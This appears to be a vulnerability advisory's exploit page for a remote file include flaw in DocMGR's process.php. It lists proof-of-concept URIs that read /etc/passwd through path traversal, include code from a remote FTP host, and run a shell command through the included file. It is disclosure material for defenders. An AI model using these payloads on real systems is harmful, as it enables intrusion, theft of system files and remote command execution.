• info
• discussion
• exploit
• solution
• references

DocMGR Process.PHP Remote File Include Vulnerability


An exploit is not required.

The following proof of concept exploit is available:

Example URI have been provided as well:

http://www.example.com/[path_to_docmgr]/modules/center/admin/accounts/process.php?includeModule=suntzu&siteModInfo[suntzu][module_path]=../../../../../../../../../etc/passwd%00

http://www.example.com/[path_to_docmgr]/modules/center/admin/accounts/process.php?includeModule=suntzu&siteModInfo[suntzu][module_path]=ftp://username:password@www.examplet.com/

http://www.example.com/[path_to_docmgr]/modules/center/admin/accounts/process.php?cmd=ls%20-la&includeModule=suntzu&siteModInfo[suntzu][module_path]=ftp://username:password@www.example.com/

• http://www.securityfocus.com/vulnerabilities/exploits/docmgr_0542_incl_xpl.php